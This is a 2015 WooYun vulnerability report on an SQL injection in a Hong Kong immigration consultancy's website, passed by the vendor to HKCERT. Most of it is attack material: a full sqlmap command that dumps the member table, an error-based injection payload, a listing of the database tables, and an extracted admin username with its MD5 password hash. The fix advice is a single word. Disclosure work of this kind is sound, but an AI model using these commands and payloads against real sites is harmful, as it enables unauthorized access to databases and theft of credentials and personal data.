当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156884

漏洞标题:御国天下移民顾问有限公司主站存在SQL注射漏洞(管理密码泄露)(香港地區)

相关厂商:御国天下移民顾问有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 11:35

修复时间:2016-01-16 11:00

公开时间:2016-01-16 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

御国天下移民顾问有限公司主站存在SQL注射漏洞(管理密码泄露)

详细说明:

地址:http://**.**.**.**/about.php?aid=9

$ python sqlmap.py -u "http://**.**.**.**/about.php?aid=9" -p aid --technique=BE --random-agent --batch  -D worldvisa -T php_members -C username,password,qq,telephone,email,alipay,mobile --dump

漏洞证明:

---
Parameter: aid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: 'worldvisa_f@localhost'
current user is DBA: False
database management system users [1]:
[*] 'worldvisa_f'@'localhost'
Database: worldvisa
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| php_product | 292 |
| php_product_dir | 102 |
| php_service | 33 |
| php_menu | 15 |
| php_link | 12 |
| php_down_dir | 9 |
| php_feedback | 9 |
| php_comment_list | 7 |
| php_mpb | 7 |
| php_article_dir | 6 |
| php_article_include | 6 |
| php_photo_dir | 6 |
| php_about | 5 |
| php_groups | 5 |
| php_about_include | 3 |
| php_case_include | 3 |
| php_down | 3 |
| php_news | 3 |
| php_news_dir | 3 |
| php_news_include | 3 |
| php_plugins | 3 |
| php_product_include | 3 |
| php_article | 2 |
| php_article_dir_include | 2 |
| php_blog_logs | 2 |
| php_blog_logs_dir | 2 |
| php_blog_photo_dir | 2 |
| php_down_dir_include | 2 |
| php_down_include | 2 |
| php_link_include | 2 |
| php_mpb_dir | 2 |
| php_person | 2 |
| php_photo | 2 |
| php_product_orders | 2 |
| php_stat | 2 |
| php_about_setup | 1 |
| php_ad | 1 |
| php_blog_logs_dir_include | 1 |
| php_blog_logs_include | 1 |
| php_blog_setup | 1 |
| php_case | 1 |
| php_case_dir | 1 |
| php_case_dir_include | 1 |
| php_comment | 1 |
| php_contact | 1 |
| php_contact_include | 1 |
| php_guest | 1 |
| php_members | 1 |
| php_mpb_dir_include | 1 |
| php_mpb_include | 1 |
| php_news_dir_include | 1 |
| php_person_include | 1 |
| php_photo_dir_include | 1 |
| php_photo_include | 1 |
| php_product_dir_include | 1 |
| php_resource | 1 |
| php_resource_dir | 1 |
| php_resource_dir_include | 1 |
| php_resource_include | 1 |
| php_service_include | 1 |
| php_setup | 1 |
| php_smtpmail | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1671 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| STATISTICS | 229 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 115 |
| TABLES | 115 |
| KEY_COLUMN_USAGE | 75 |
| TABLE_CONSTRAINTS | 75 |
| CHARACTER_SETS | 39 |
| PLUGINS | 23 |
| SCHEMA_PRIVILEGES | 18 |
| ENGINES | 9 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+


Database: worldvisa
Table: php_product
[292 entries]


---
Parameter: aid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[38 columns]
+--------------+-----------------------+
| Column | Type |
+--------------+-----------------------+
| address | varchar(150) |
| adminid | tinyint(1) |
| alipay | varchar(80) |
| available | tinyint(2) |
| avatar | varchar(150) |
| bday | varchar(10) |
| bmonth | varchar(10) |
| byear | varchar(10) |
| city | varchar(50) |
| content | text |
| credits | int(10) |
| edulevel | varchar(30) |
| email | varchar(50) |
| gender | tinyint(1) |
| groupid | smallint(6) unsigned |
| homepage | varchar(100) |
| idcard | varchar(80) |
| idtype | varchar(30) |
| income | varchar(30) |
| industry | varchar(30) |
| invisible | tinyint(1) |
| lastactivity | int(10) unsigned |
| lastpost | int(10) unsigned |
| mobile | varchar(50) |
| msn | varchar(80) |
| occupation | varchar(30) |
| oltime | smallint(6) unsigned |
| pageviews | mediumint(8) unsigned |
| password | varchar(32) |
| postid | varchar(20) |
| posts | mediumint(8) unsigned |
| qq | varchar(15) |
| regdate | int(10) unsigned |
| regip | varchar(15) |
| telephone | varchar(50) |
| truename | varchar(100) |
| uid | mediumint(8) unsigned |
| username | varchar(15) |
+--------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: aid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=9' AND (SELECT 8311 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(8311=8311,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'knoB'='knoB
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: worldvisa
Table: php_members
[1 entry]
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| username | password | qq | telephone | email | alipay | mobile |
+----------+----------------------------------+---------+-----------+---------+---------+---------+
| 020jt | d6a74d5ead4c725ed869d90d5660991e | <blank> | <blank> | <blank> | <blank> | <blank> |
+----------+----------------------------------+---------+-----------+---------+---------+---------+

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-02 10:58

厂商回复:

Referred to related parties.

最新状态:

暂无